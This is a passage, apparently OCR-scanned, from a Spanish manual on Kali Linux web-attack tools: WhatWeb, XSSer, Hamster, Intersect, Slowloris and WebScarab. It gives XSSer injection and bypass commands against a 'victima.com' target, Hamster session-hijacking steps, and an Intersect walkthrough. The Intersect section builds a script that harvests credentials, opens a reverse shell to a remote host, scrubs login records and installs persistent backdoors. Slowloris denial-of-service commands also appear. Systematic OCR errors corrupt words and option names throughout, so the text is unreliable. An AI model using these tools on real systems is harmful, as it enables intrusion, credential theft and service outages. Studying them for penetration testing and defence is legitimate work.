Espeeifieando un valor vaeio, por ejemplo "User-Agent:" lo 
eliminará. 

—follow-redireot=WHEN 

Controlar euando se siguen redireeeiones. WHEN puede ser 
'never http-only', 'meta-only same-site', 'same-domain 'o' 
always'. Predeterminado: always. 

—max-redireots=NUM 

Número máximo de redireeeiones. Predeterminado: 10. 


Autentieaeión: 


—user, -u=<user:password> 

Autentieaeión básiea HTTP. 

—eookie, -o=COOKIES 

Utilizar eookies, por ejemplo 'name=value;name2=value2'. 


Proxy: 


—proxy <hostname[:port]> 

Estableeer el nombre del proxy y el puerto. 
Predeterminado: 8080. 

—proxy-user <username:password> 

Estableeer el nombre del usuario del proxy y la 
eontraseña 


Plugins: 


—list-plugins, -1 

Eistar todos los plugins. 

—info-plugins, -I=[SEARCH] 

Lista todos los plugins eon informaeión detallada. 
Opeionalmente busear eon palabras elave en una lista 
delimitada por eomas. 

—searoh-plugins=STRING 

Busear plugins eon una palabra elave. 

—plugins, -p=EIST 

Seleeeionar uno o más plugins. LIST es un eonjunto de 
plugins delimitados por eomas. El valor predeterminado es 
todo. Cada elemento puede ser un nombre de direetorio. 









archivo o plugins y opcionalmente puede tener un 
modificador, +/-. Ejemplos; + /tmp/moo.rb, + /tmp/foo.rb 
tifie, md5, +. /Plugins-disabled/ ./plugins-disabled,-md5 -p + 
es un acceso directo para -p + plugins-disabled. 

—grep, -g=STRING 

Buscar STRING en las respuestas HTTP. 

—custom-plugin=DEFINITION 

Definir un plugin personalizado llamado Custom-Plugin, 
Ejemplo;"; text => ’powered by abe'""; versión => / 
powered []? By ab [0-9] /""; ghdb => intitle; abe "powered 

by abe.; md5 =>' 8666257030b94d3bdb46e05945f60b42 

{; text =>' powered by abe '} " 

-dorks=PLUGIN 

Eista de Google dorks para el complemento seleccionado. 


Salida; 


—verbose, -v 

Modo verbose. Utilizar 2 veces para la depuración. 

—colour,—color=WHEN 

Utilizar el color. WHEN puede ser ’never', 'always" o 'auto'. 

—quiet, -q 

No mostrar un breve registro en STDOUT. 

—no-errors 

Suprimir los mensajes de error. 


Re gistro; 


—log-brief=EIEE 

Registro breve, salida de una línea. 

—log-verbose=EIEE 

Registro detallado de salida. 

—log-errors=EIEE 

Registro de errores 

—log-xml=EILE 

Registrar en formato XME 

—log-json=EIEE 

Registrar en formato JSON. 

—log-sql=EIEE 

Registrar las instrucciones SQEINSERT. 

—log-sql-create=EIEE 

Crear tablas de base de datos SQE. 

—log-j son-verbose=EIEE 

Registro en formato JSON detallado. 

—log-magictree=EIEE 

Registro en formato de MagicTree XME. 

—log-obj ect=EIEE 

Registro en formato de inspección de objetos en Ruby. 

—log-mongo-database 

Nombre de la base de datos MongoDB 

—log-mongo-collection 

Nombre de la colección MongoDB. 

Predeterminado; whatweb. 

—log-mongo-host 

Nombre de host o dirección IP de MongoDB. 

Predeterminado; 0.0.0.0. 

—log-mongo-username 

Nombre de usuario de MongoDB. Predeterminado; nil. 

—log-mongo-password 

Contraseña de MongoDB. Predeterminado; nil. 

—log-elastic-index 

Nombre del índice para almacenar resultados. 

Predeterminado; whatweb 

—log-elastic-host 

Host; puerto de la interfaz http elástica. 

Predeterminado; 127.0.0.1;9200 






Rendimiento y estabilidad; 


—max-threads, -t 

Número de threads simultáneos. Predeterminado: 25. 

—open-timeout 

Tiempo en segundos. Predeterminado: 15. 

—read-timeout 

Tiempo en segundos. Predeterminado: 30. 

-wait=SECONDS 

Esperar SECONOS entre las conexiones. Esto es útil cuando se 
utiliza un solo thread. 


Ayuda y varios: 


—short-help 

Ayuda corta. 

—help, -h 

Ayuda completa. 

—debug 

Modo depuración 

—versión 

Mostrar información de la versión. 


Plugins 

Cuando se haee una búsqueda, las eoineideneias se haeen eon: 

* Cadenas de texto (mayúseulas y minúsculas) 

* Expresiones regulares 

* Consultas de bases de datos de Google Hack 

* Hashes MD5 

* Reconocimiento de URL 

* Patrones de etiquetas HTML 

* Código ruby personalizado para operaciones pasivas y agresivas 

Ejemplos: 

1. Escanear example.com. 
whatweb example.com -a 4 

2. Escanear reddit.com slashdot.org con las descripciones verbose plugin. 
whatweb -v reddit.com slashdot.org 

3. Un escaneo agresivo de wired.com detecta la versión exacta de WordPress. 
whatweb -a 3 www.wired.com 

4. Escanear la red local rápidamente y suprimiendo los errores, 
whatweb —no-errors 192.168.0.0/24 

ó.Escanebar la red local para los sitios web https. 
whatweb —no-errors -url-prefix https:// 192.168.0.0/24 
6. Escanear las políticas crossdomain en Alexa Top 1000. 

whatweb -i plugin-development/alexa-top-lOO.txt \ —url-suffix /crossdomain.xml -p 
crossdomain xml 





58. XSSer 


Se trata de un programa que permite; 

• Detectar vulnerabilidades de tipo XSS 

• Explorar dichas vulnerabilidades de forma local o remota. 

• Reportar en tiempo real las vulnerabilidades encontradas. 

Entre sus principales funcionalidades destacan: 

• Interfaz gráfica 

• Dorking 

• Soporte para GET y POSE. 

• Crawling 

• Proxy 

• Análisis heuristico 

• Exploits preconfigurados 

• Opciones de exportación. 

• Diferentes bypassers para evadir los filtros 

Tipos de inyecciones permitidas: 

• XSS clásica, es decir, la ejecución de código en un script incrustado 

• Cookie Injection 

• Cross Site “Agent” Scripting 

• Cross Site “Refer” Scripting 

• Inyecciones en “Data Control Protocol” y “Document Objetct Model” 

• HTTP Responso Splitting Induced 

Uso: 

xsser [opciones] [-u <url> |-i <fde> |-d <dork>] [-g <get> |-p <post> |-c <crawl>] [Request(s)] 
[Vector(s)] [Bypasser(s)] [Technique(s)] [Piñal Injection(s)] 

Opciones: 


—versión 

Mostrar la versión del programa y salir. 

-h, —help 

Mostrar la ayuda y salir 

-s, —statistics 

Mostrar los resultados de salida de las estadísticas avanzadas 

-V, —verboso 

Modo verboso 

-gtk 

Modo interfaz gráfica 


Características especiales: 

Se puede elegir Vector(s) y Bypasser(s) para inyectar código con estas características especiales 
adicionales: 


-imx=IMX 

Crear una imagen falsa con código XSS incorporado 

-fla=PLASH 

Crear un archivo falso .swf con código XSS incrustado 


Objetivos seleccionados: 

Al menos debe especificarse una de estas opciones para establecer las URL de destino. 


-u URL, -url=URL 

Ingresar los destinos a auditar 

-i READPILE 

Leer las URL de destino de un archivo 






-d DORK 

Procesar los resultados del motor de búsqueda como URL de 
destino. 

-De=DORK_ENGINE 

Motor de búsqueda a utilizar para dorking (bing, altavista, yahoo, 
baidu, yandex, youdao, webcrawler, google, etc.) 


Selección del tipo de conexiones HTTP/HTTPS: 

Estas opciones se pueden usar para especificar que parámetros se quieren usar como payload para 
iny ectar código. __ 


-g GETDATA 

Ingresar la payload para auditar usando GET. 

Por ejemplo: '/menu.php?q=' 

-p POSTDATA 

Ingresar la payload para auditar usando POST. 

Por ejemplo: Too = 1 & bar =' 

-c CRAWLING 

Número de URLs a rastrear en destino (s): 1-99999 

-Cw=CRAWLER_WIDTH 

Nivel de profundidad del rastreador: 1-5 

-C1 

Rastrear solo direcciones URL de destino local. 
Predeterminado: truc 


Configurar las solicitudes: 

Estas opciones se pueden usar para especificar como conectarse a las payloads de destino. Se 
pueden elegir varias de ellas. 


—cookie=COOKIE 

Cambiar el encabezado HTTP Cookie 

—drop-cookie 

Ignorar el encabezado Set-Cookie de la respuesta 

—user-agent=AGENT 

Cambiar el encabezado User-Agent HTTP. 

Predeterminado SPOOEED 

—referer=REPERER 

Utilizar otro encabezado de referencia HTTP. 

Predeterminado NONE 

—xforw 

Configurar el HTTP X-Eorwarded-Eor con valores de direcciones 
IP aleatorias 

—xclient 

Configurar el HTTP X-Client-IP con valores de direcciones IP 
aleatorias 

-headers=HEADERS 

Los encabezados HTTP adicionales se separan con una nueva 
línea 

—auth-type=ATYPE 

Tipo de autenticación HTTP (Basic, Digest, GSS o NTLM) 

—auth-cred=ACRED 

Credenciales de la autenticación HTTP (nombre: contraseña) 

—proxy=PROXY 

Utilizar servidor proxy (tor: http: // localhost: 8118) 

—ignore-proxy 

Ignorar el proxy HTTP predeterminado del sistema 

—timeout=TIMEOUT 

Seleccionar el tiempo de espera. Por defecto 30 

—retries=RE TRIES 

Reintentar cuando los tiempos de espera de conexión caducan. 
Predeterminado 1 

-threads=THREADS 

Número máximo de solicitudes HTTP simultáneas. 

Valor predeterminado 5 

-delay=DELAY 

Retardo en segundos entre cada solicitud HTTP. 

Valor predeterminado 0 






—tcp-nodelay 

Usar la opción TCP NODEEAY 

—follow-redirects 

XSSer seguirá las respuestas de redireccionamiento del servidor 

—follow-limit=EEI 

Establecer el número de veces que XSSer seguirá las 
redirecciones. Valor predeterminado: 50 


Sistemas del inspeetor; 

Estas opeiones son útiles para saber si los objetivos tiene algunos filtros eontra ataques XSS para 
red ueir los resultados de falsos positivos y para realizar pruebas más avanzadas: _ 


—no-head 

No verificar la estabilidad de la URL (códigos: 200 302) con una 
solicitud de comprobación previa de HEAD 

-alive=ISALIVE 

Establecer el limite de cada error que XSSer debe tener para 
verificar que el objetivo está vivo 

—hash 

Enviar un hash único, sin vectores, para verificar previamente si el 
objetivo repite todo el contenido recibido 

—heuristic 

Iniciar una prueba heuristica para descubrir que parámetros se 
filtran en el código de destino (s):; \ / <> "'= 

—checkaturl=AET 

Verificar una respuesta XSS válida de los objetivos en una URL 
alternativa. 

—checkmethod=ALTM 

Verificar las respuestas de los destinatarios utilizando un tipo de 
conexión diferente: GET o POSE. Predeterminado: GET 

—checkatdata=ALD 

Verificar las respuestas de los objetivos usando una payload 
alternativa. Por defecto: igual que la primera inyección 

—reverse-check 

Establecer una conexión inversa de destino a XSSer para certificar 
que es 100% vulnerable 


Seleeeionar el veetor: 

Estas opeiones se pueden usar para espeeifiear un eódigo fuente del vector XSS para inyectar en 
cada payload. Importante: si no desea intentar inyectar un vector XSS común, se utiliza de forma 
predeterminada. Elegir una sola opción: 


-payload=SCRIPT 

OWN - Insertar su construcción XSS - manualmente - 

—auto 

AUTO - Insertar vectores 'reportados' de XSSer desde un 
archivo 


Seleccionar Bypasser: 

Estas opciones se pueden usar para codificar los vectores seleccionados para tratar de evitar los 
posibles fdtros anti-XSS en el código del objetivo y las posibles reglas IPS si las usa el objetivo. 
Ade más se puede combinar con otras técnicas para proporcionar codificación: _ 


-Str 

Utilizar el método String.EromCharCode() 

—Une 

Utilizar la fúnción Unescape() 

-Mix 

Mezclar String.EromCharCode() y Unescape() 

—Dec 

Usar codificación decimal 

—Hex 

Usar codificación hexadecimal 

—Hes 

Utilizar codificación hexadecimal, con punto y coma. 

—Dwo 

Codificar vectores direcciones IP en DWORD 







—Doo 

Codificar vectores de direeciones IP en oetal. 

-Cem=CEM 

Intentar manualmente diferentes mutaciones de codifieación de 

caracteres 


Técnicas especiales: 

Estas opeiones se pueden usar para intentar inyeetar código utilizando diferentes tipos de téenicas 
XSS. Se pueden seleccionar varias de ellas. 


--Coo 

COO - Cross Site Scripting Cookie injection 

—Xsa 

XSA - Cross Site Agent Seripting 

-Xsr 

XSR - Cross Site Referer Seripting 

—Dcp 

DCP - Data Control Protocol injections 

—Dom 

DOM - Document Object Model injections 

—Ind 

IND - HTTP Responso Splitting Induced code 

—Anehor 

ANC - Use Anehor Stealth payloader (DOM shadows!) 

—Phpids 

PHP - Exploit PHPIDS bug (0.6.5) to bypass filters 


Seleccionar las inyecciones finales: 

Estas opciones se pueden usar para especificar el eódigo final a inyectar en los objetivos 
vu lnerables. Elegir una sola opeión: 


-Pp=FINALPAYEOAD 

OWN - Insertar su código final para inyectar manualmente 

-Er=EINAEREMOTE 

REMOTE -Insertar su código final para inyectar remotamente 

—Doss 

DOSs - Inyeeción de denegación de servicio (servidor) XSS 

--Dos 

DOS - Inyección de denegación de servieio (cliente) XSS 

-B64 

B64 - Codifieaeión de código Base64 en la etiqueta META 


Inyeceiones finales especiales: 

Estas opeiones se pueden usar para ejeeutar algunas inyeeeiones espeeiales en objetivos 
vulnerables. Se pueden seleccionar más de una y eombinarlo con su código final excepto con el 
código DCP: 


—Onm 

ONM - Utilice el evento onMouseMove() para inyeetar código 

-Ifr 

IFR - Use la etiqueta fuente <iframe> para inyeetar el eódigo 


Varios: 


—silent 

Inhibir los resultados de salida de la consola 

—update 

Verificar la última versión estable de XSSer 

—save 

Enviar todos los resultados directamente a un registro. 

Por defeeto XSSlist.dat 

-xml=FILEXME 

Enviar la salida 'positivos' a un arehivo aXME. 

Por defecto —xml filename.xml 

-short=SHORTURLS 

Mostrar -final código- corto 

—launch 

Iniciar un navegador al final con cada XSS descubierto 

—tweet 

Publicar cada XSS descubierto en el 'Cray Swarm!' 








—tweet-tags=TT 


Agregar más etiquetas a sus publicaciones XSS descubiertas. Por 
defecto: #xss. Por ejemplo: #xsser #vulnerability 


Eemplos en modo línea de comandos 

• Inyección básica 

xsser -u “victima.com” 

• Inyección automática con prueba todos los vectores 

xsser -u “victima.com” —auto 

• Inyección con payload personalizado. En este caso la payload es el carácter > 

xsser -u “victima.com” —payload=”>” 

• Explotación en local 

xsser -u “victima.com” —Ep = 

• Explotación en remoto 

xsser -u “victima.com” —Er=”” 

• Utilización de dorking 

xsser -d “inurl: admin/echo” —De “google” —Ep =”” 

• Utilización de proxy y spoofing de cabecera HTTP Refer 

xsser -u “victima.com” —proxy http://localhost:8118 —refer “666.666.666.666” 

• Utilización de codificación hexadecimal 

xsser -u “victima.com” —Hex 

• Inyección múltiple con 5 hilos y codificación con mutación 

xsser -u “victima.com” —Cem —threads “5” 

• Utilización del crawler con profundidad 3 y 4 páginas 

xsser -u “victima.com” -c3 —Cw=4 

• Explotación a través de POST 

xsser -u “victima.com” -p “target_host=nombre&dns-lookup-php-submit- 
button=Eookup+DN S” 

Uso modo gráfico 

Cuando se abre, se visualizan las pestañas siguientes: XSSER, Configure, Map, Results, Wizard y 
About. Esta pestaña Aobout nos informa de la versión que se está utilizando. 

Seleccionando la pestaña Configure se abre la ventana que se ve a continuación y que permite 
establecer los parámetros de configuración. 

A la izquierda se tiene las 8 principales opciones de configuración: 

• Connections(s). Aqui se puede configurar el tipo de conexión, el proxy, etc. 

• Checker(s). 

• Vector(s) 

• Anti-antiXSS/IDS. Selección de exploits. 

• Bypasser(s) 

• Technique(s) 

• Exploit. 

• Reporting. Tipo de informe 

Ea opción Wizard es la que aconseja para empezar a usar este programa, porque te guia. De todas 
maneras lo primero es ir a la pestaña Map y activar la opción Connect a ON. Asi se abre un mapa 
mundial y en ella se puede seguir lo que va haciendo el XSSer. 





A continuación ir a la pestaña XSSer y seleccionar el modo Intruder. Eseribir la URL a atacar en el 
eampo Fly mode(s) de la pestaña XSSer. Ahora seleeeionar las opeiones Auto y Yerbóse en esta 
pestaña. 

A eontinuación hacer cliek en el botón Aim! y ahora se visualiza el eomando que se deberla eseribir 
si funeionara en el modo linea de eomando. Ahora haeer eliek en el botón Fly eon lo que eomienza 
el ataque. 

Ahora ir a la pestaña Map para ver lo que está sueediendo. También se puede ver en la ventana 
Terminal que eódigo funeionará y en que navegador. 



59. ATAQUES WEB 


hámster 

Herramienta de "sidejacking". Sidejacking es una forma de secuestro de sesión HTTP 
que funciona con escuchas pasivas. 

intersect 

Ejecución de módulos 

slowloris 

Es básicamente un ataque de denegación de servicio HTTP muy bueno 

webscarab 

Está anticuado y ha sido suplantado por ZAP (Zed Attack Proxy) 

wfuzz 

Herramienta diseñada para aplicaciones web de fuerza bruta 

zap 

herramienta de prueba de penetración fácil de usar para encontrar vulnerabilidades en 
aplicaciones web. 




60. Hámster 


Hámster es una herramienta de "sidejaeking". Sidejacking es una forma de seeuestro de sesión 
HTTP que funeiona con escuchas pasivas. El secuestro de la sesión HTTP es donde el hacker toma 
sus cookies de sesión. Su sesión con el servidor web se identifica con una cookie única. Esta cookie 
se envia a su navegador al comienzo de la sesión y su navegador la devuelve desde este punto en 
adelante. 

Hay muchas formas de secuestro de sesión. Algunos utilizan secuencias de comandos entre sitios 
para obtenerlos de su navegador. Algunos usan ataques de MITM para interceptar la conexión y 
luego volver a enviarla. El método de sidejacking utiliza espionaje pasivo de cookies. Eos usuarios 
recolectan cookies utilizando un snififer de paquetes, luego las importan al navegador. A diferencia 
de otros métodos de secuestro de sesión, no hay nada que el usuario pueda ver que les diga que su 
sesión está siendo secuestrada. 

Además el secuestro de sesión permite ataques fuera de linea. Eas cookies de sesión duran mucho 
tiempo, a veces durante años. Eso significa que un pirata informático podria capturar paquetes con 
un rastreador de paquetes en un momento, y luego, semanas más tarde, en otra parte del mundo, 
importar las cookies en el navegador y acceder a la sesión. 

Hámster básicamente clona las cookies de la victima sniffing sus ID de sesión y controlando las 
cuentas de su sitio web. Ea herramienta no requiere capturar contraseñas, solo las cookies y el rastro 
de EÍRL que deja el usuario. Hámster es un proxy al igual que el software proxy HTTP Squid. 

Eas cookies se rastrean utilizando el programa Eerret y usar ettercap como sniffer. 

Uso: hámster 

Cuando se ejecuta, se ve 

oot@kali:-'# hámster 
— HAMPSTER 2.0 side-jacking tool — 
begining thread 

Set browser to use proxy http://127.0.0.1:1234 
DEBUG: set_ports_option(1234) 

DEBUG: mg_open_listening_port(1234) 

Proxy: listening on 127.0.0.1:1234 

push: Broken pipe 

push: Broken pipe 

starting adapter ethO 

execle(ferret): No such file or directory 

starting adapter ethO 

execle(ferret): No such file or directory 

push: Broken pipe 

push: Broken pipe 

A continuación ejecutar en el navegador 127..0.0.1:1234 y se visualiza lo siguiente 

HAMSTER 2.0 Side-Jacking 
[ adapters | help ] 



PASOS: para realizar sesiones web seeundarias, seguir estos pasos. 

1) Haeer elle en el menú del adaptador y eomenzar a escuehar 

2) Espere unos segundos y asegúrarse de reeibir los paquetes. 

3) Esperar hasta que aparezean los objetivos. 

4) Heer elle en el objetivo para clonar su sesión. 

5) Purgar las cookies del navegador solo para asegurarse de que ninguna entre en conflicto con 
objetivos clonados. 

Antes de todos estos pasos, se debe establecer un dispositivo para que haga de puente, es decir, 
tenga activada la funcionalidad MitM, por ejemplo el programa ettercap. 



61. Intersect 


Esta versión se centra principalmente en los módulos individuales y en la capacidad de generar sus 
propios Scripts de Intersect personalizados a partir de los módulos individuales. Al utilizar la 
aplicación create.py, el usuario es guiado a través de un proceso controlado por menús que le 
permite seleccionar que módulos le gustarla incluir, importar sus propios módulos personalizados y 
finalmente crear un script Intersect que se construye alrededor de los módulos especificos que 
escoger. 

Intersect 2.5 - Script Creation Utility 


1 => Créate Custom Script 

2 => List Available Modules 

3 => Load Plugin Module 

4 => Exit Creation Utility 

Comandos 


:help 

Visualiza la lista de comandos 

: active 

Muestra la lista de módulos activados 

: créate 

Crear una payload a partir de la lista de módulos activados 

: olear 

Limpiar la pantalla 

:info module 

Mostar la descripción del módulo 

:modules 

Lista de módulos disponibles 

module 

Añadir un módulo 

:rem module 

Elimina el módulo 

:quit 

Vuelve al menú principal 


Intersect viene con varios módulos por defecto. Los siguientes son algunos de los módulos 
proporcionados, que están relacionados con la recolección de información posterior a la 
explotación; 


archive 

Crea un archivo tar de todos los archivos ubicados dentro del directorio 
temporal de sesiones de intersect 

creds 

Reúne las credenciales del usuario y del sistema. Busca contraseñas, 
claves SSH, certificados SSL, ciertos créditos de aplicaciones, historiales 
de usuarios, etc. 

extras 

Busca configuraciones de sistemas, servicios y aplicaciones. También 
intenta localizar ciertas aplicaciones instaladas y medidas de protección. 

network 

Recopila información de red como puertos de escucha, información de 
DNS, conexiones activas, reglas de cortafúegos, etc. 

reversexor 

Abre un shell TCP cifrado XOR inverso a un host remoto. Shell 
interactivo con descarga/carga y ejecución remota del módulo intersect. 

scrub 

Intenta eliminar el nombre de usuario y la dirección IP actualmente 
conectados de utmp, wtmp y lastlog. Método intrusivo. 

bshell 

Inicia un shell de enlace TCP en el sistema de destino. Shell interactivo 







con descarga/carga, CD y capacidad para ejecutar otros módulos de forma 
remota. 

daemon 

Modo deamon del script de intersect. Cuando se ejecute, se le dará el PID 
para monitorizar o matar la tarea si es necesario 

lanmap 

Usa Scapy para enumerar los dipositivos vivos y recopilar sus direcciones 
IP 

osuser 

Enumerar la distribución de Einux, el núcleo, las aplicaciones y servicios 
instalados, impresoras, cronjobs, listas de usuarios y archivos de historial, 
información de CPU y memoria, etc. 

rshell 

Abrir un shell TCP inverso a un dispositivo remoto. Shell interactivo con 
descarga/carga y ejecución remota del módulo Intersect. 

xorshell 

Iniciar un shell de enlace TCP en el sistema de destino. Shell interactivo 
con descarga/carga, CD y capacidad para ejecutar otros módulos de forma 
remota. 

aeshttp 

Iniciar un shell HTTP inverso con cifrado AES que se conectará de nuevo 
a un dispositivo remoto. 

getrepos 

Intenta encontrar varios repositorios de código fuente y herramientas de 
administración. 

openshares 

Utilizar smbclient para encontrar recursos compartidos SMB abiertos en 
un dispositivo determinado. 

portscan 

Escaneo de puertos muy simple. Escanea ios puertos 1 - 1000 en la IP 
especificada. Mejor utilizarlo contra hosts de LAN. 

sniífwebproxy 


xmpp 


egressbuster 

Comprueba un rango de puertos para encontrar los puertos de salida 
disponibles. 

icmpshell 


persisten! 

Instalar cualquier módulo de shell Intersect como puerta trasera 
persistente. Comenzará shell en cada reinicio del sistema. 

prívese 

Comprueba si el kernel de Linux existe posibles exploits de escalada de 
privilegios. Proporciona CVE y enlace de descarga si está disponible. 

udpbindxmlcrack 



61.1. Creación de un módulo 

Para ejecutar un módulo, primero se debe creae y para ello deben seguirse los pasos siguientes. 
Escribir los módulos que se deseen en la opción de agregar, presionando [enter] después de cada 
módulo. 

Ejemplo: 

=> creds 
=> network 


Cuando se hayan ingresado todos los módulos deseados, iniciar el proceso de compilación 
escribiendo 




=> xreate 


Escribir un nombre por ejemplo kali para su referencia en interseet. El seript terminado se coloeará 
en el directorio Scripts. No incluir la extensión de arehivo Python. 

=> kali 

El seript se guardará en /usr/share/intersect/Scripts/kali.py 

Espeeifiear el directorio en el sistema de destino donde se guardarán los arehivos y la información 

recopilados. Deberla ser un NEIEVO directorio. Al salir de interseet, este directorio se eliminará si 

no contiene arehivos. Por defecto se usará /tmp/lift+$randomstring. 

temp direetory => /tmp/interseet 

enable logging => 

bind port => 4444 

[+] bind port saved. 

remóte host=> 192.168.1.202 

[+] remóte host saved. 

remóte port => 4444 

[+] remóte port saved. 

proxy port => 

xor eipher key => 

osuser 

network 

[+] Your custom Interseet seript has been created! 

Eocation: /usr/share/intersect/Scripts/kali.py 



62. Slowloris 


Para ejecutarlo ir a /root/slowloris y escribir python slowloris.py 

Slowloris es básicamente un ataque de denegación de servicio HTTP muy bueno que afecta a los 
servidores web. Se empieza haciendo muchas peticiones HTTP. Se envían encabezados 
periódicamente (cada ~ 15 segundos) para mantener las conexiones abiertas. Nunca se cierra la 
conexión a menos que el servidor lo haga. Si el servidor cierra una conexión, creamos una nueva 
seguimos haciendo lo mismo. Esto agota las conexiones del servidor y el servidor no puede 
responder a otras personas. 

uso: slowloris.py [-h] [-p PORT] [-s SOCKETS] [-v] [-ua] [-x] 

[—proxy-host PROXY HOST] [—proxy-port PROXY PORT] 

[—https] [—sleeptime SEEEPTIME] 

[host] 

host Host a atacar 

Argumentos opcionales 


-h, —help 

Mostrar la ayuda y salir 

-p PORT, —port PORT 

Puerto del servidor web, en general 80 

-s SOCKETS, -sockets SOCKETS 

Cantidad de sockets a usar en el ataque 

-V, —verbose 


-ua, —randuseragents 

Aleatorizar usuarios-agentes con cada solicitud 

-X, — useproxy 

Usar un proxy SOCKS5 para conectarse 

-proxy-host PROXY HOST 

SOCKS5 proxy host 

—proxy-port PROXY PORT 

SOCKS5 proxy port 

—https 

Usar https en las solicitudes 

—sleeptime SEEEPTIME 

Tiempo entre cada encabezado enviado. 


Ejemplos 

1. Configurar el puerto que Slowloris está inundando 
slowloris.py www.example.com -port 80 

2. Agregar el número de sockets que desea abrir, 
slowloris.py www.example.com -port 80 -s 500 

3. Atacar algunos HTTPS 

slowloris.py www.example.com -port 443 - sleeptime 30 -s 500 -https 




63. WebScarab 


WebScarab es una potente herramienta de evaluación de seguridad de aplicaciones web. Tiene 
varios modos de operación, pero se opera principalmente a través del proxy de intercepción. Este 
proxy se encuentra entre el navegador del usuario final y la aplicación web de destino para 
monitorizar y modificar las solicitudes y las respuestas que se transmiten a cada lado. Este proceso 
ayuda al auditor a elaborar manualmente la solicitud maliciosa y observar la respuesta rechazada 
por la aplicación web. Cuenta con una serie de herramientas integradas como fuzzer, análisis de ID 
de sesión, spider, analizador de servicios web, XSS y CREE Escáner de vulnerabilidades, 
transcodificador y otros. 

Uso: webscarab 

Cuando arranca webscarab se visualiza la pantalla siguiente 



Configuración del proxy 

Se trata de que todo el tráfico entre el ordenador donde está instalado Webscarab e Internet pase por 
el programa Webscarab para su análisis. Para analizar un servidor web, el ordenador navega por sus 
páginas web, que son interceptadas por Webscarab. Hay 2 posibilidades: proxy de red y proxy local. 

Proxy de red 

En el caso de proxy de red, se deberá configurar WebScarab con la misma configuración. Se puede 
verificar si sus navegadores web actuales están utilizando un proxy de red de la siguiente manera: 

• Eirefox, con Herramientas> Opciones> Avanzado> Red> Configuración 

• Explorador de Internet, con Herramientas> Opciones de Intemet> Conexiones> Configuración de 
LAN> Avanzado 

• Opera, con Herramientas> Preferencias> Avanzado> Red> Servidores proxy 










Si está autorizado para conectarse alguién más de la red y no puede conectarse a la aplicación web 
que se está investigando, pregunte si necesita configurar el proxy para acceder. 

Para configurar el proxy en WebScarab, hacer clic en la opción Proxies de la pestaña Tools. 

Ahora se abre la ventana siguiente, donde se escribirá el nombre o la dirección del proxy si se 
requiere. 

Proxy local 

Para enviar y recibir solicitudes HTTP, configurar el proxy de red es todo lo que se requiere. 
WebScarab puede actuar como un agente de usuario al igual que su navegador; 

V«0 
Bfowsef 


WebScarab 



Your Computer 


NETWORK Proxy 

(OPTIONAL) 


Webserver 


Sin embargo, WebScarab es más útil cuando se configura como un proxy local para los navegadores 
web existentes y posiblemente otros programas y herramientas: 



Your Computer 


NETWORK Proxy 

(OPTIONAL) 


WEB Server 


Para configurar WebScarab como un proxy local ascendente, se debe configurar sus escuchas 
y luego cambiar la configuración del navegador y otras herramientas/programas para enrutar su 
tráfico HTTP a través de WebScarab. 

Alternativamente se puede seleccionar el objetivo en la pestaña Summary, hacer clic con el botón 
derecho y elegir el árbol Spider. Esto traerá todos los enlaces disponibles en la aplicación de 
destino. 

Configuración estándar 

En la configuración standard, normalmente solo se necesita un oyente configurado y esto debe 
marcarse como "Primary". Es posible agregar múltiples oyentes. 

Consejos: 

• Solo tener un oyente principal de lo contrario, habrá un conflicto 

• No establezca "Base URE" en el oyente principal 

• Se recomienda establecer la velocidad en "unlimited" a menos que se necesite una simulación de 
la latencia de la red. 

Configuración como oyente 

En este caso se debe seleccionar la pestaña Proxy y asegurarse de que está seleccionado la opción 
Listeners de la misma. 

























Haga clic en el eampo "Address" y erear un nuevo oyente. Normalmente será una direeción de host 
loeal, p.e. 127.0.0.1 en un número de puerto no utilizado eomo el 8008. Una vez heeho esto, liaoer 
eliek en la opeión Start. 

Confíguraeíón del navegador 

Configure eada navegador web y otras herramientas/programas para enrutar el tráfieo HTTP a 
través del el oyente prineipal de WebSearab. Todas las solieitudes/respuestas del navegador 
reeonfigurado pasarán a través del proxy direeto (WebSearab) y se grabará. Se debe eliminar, 
deshabilitar o evite el uso de herramientas/widgets/funeiones que envía el navegador que no están 
relaeionadas eon la investigaeión de la solieitud. 

Rápidamente se verá en los registros de WebSearab, pero las cosas comunes son: 

• búsqueda de sugerencias 

• uso de otros sitios web, por ejemplo, motores de búsqueda, notieias, eorreo web 

• servieios de bloqueo de privaeidad y seguridad del sitio web 

• herramientas de clasifieaeión de tráfico, por ejemplo, Alexa. 

Es importante evitar que estos eventos oeurran por 3 razones prineipales: 

1. agregan a los registros de WebSearab, lo que signifiea que puede perder solieitudesy respuestas 
importantes eon la solieitud que se investiga 

2. puede guardar los registros y alguien más puede mirarlos. No neeesita para que otras personas 
sepan lo que estás viendo o lo que quieres y está instalado en el navegador 

3. los sitios de tereeros partes pueden estableeer o eliminar eookies. 

Si se está utilizando Windows, WebSearab intentará eonfigurar Internet Explorer automátieamente 
euando se inieia y elimina la eonfiguraeión del proxy euando está eerrado de nuevo. Esta 
oaraeterístiea requiere un plugin JNI/dll, 

Ea eonfiguraeión a estableeer depende del navegador, así las opeiones son 

• Eirefox: Tools > Options > Advaneed > Network > Settings 

• Internet Explorer: Tools > Internet Options > Conneetions > LAN settings > Advaneed 

• Opera: Tools > Preferences > Advaneed > Network > Proxy servers 

Configuración proxy inverso 

Configuración del ovente 

La eonfiguraeión de URL base meneionada anteriormente solo se usa euando se necesita que el 
WebSearab aetúe eomo un proxy inverso, es deeir, pretender ser el servidor de un eliente que ha 
reparado o eonfigurado el proxy no configurables. La URL base será la direeeión HTTP o HTTPS 
de la aplieación web, eon un número de puerto eoineidente, generalmente 80 o 443. 

En esta eonfiguraeión, WebSearab debe eonfigurarse en un ordenador diferente que el eliente, y 
debería eseuehar en todas las interfaees de red, es deeir, dejar en blaneo "Address" o estableeer la 
direeción IP de red de la máquina en la que está instalado WebSearab. 

Configuración del navegador 

La aplioaeión oliente debe eonfigurarse para usar la direeeión IP de WebSearab en el oaso de proxy 
inverso para la direeeión de la aplioaeión web, editando el arohivo hosts en el ordenador donde se 
ejeouta la aplioaeión cliente y corresponde a la etiqueta “Computer” anterior. Por una aplioaeión que 
utiliza SSL, generalmente también se tendrá que importar el certifioado de WebSearab a la lista de 
oertifioados reoonooidos de la aplioaeión oliente. 



Otras configuraciones de proxy 

Hay otras configuraciones de interés en la opeión Miseellaneous de la pestaña Proxy. 


La opeión Reveal hidden fdes que por defeeto está deshabilitada, pero puede ser útil porque ayuda a 
identificar los campos ocultos de los formularios de las páginas web. 

La opeión Preven! Browser from eaehing conten! elimina cualquier "if-modified-sinee" de las 
solieitudes para garantizar que WebSearab siempre tiene una eopia del euerpo de respuesta, en lugar 
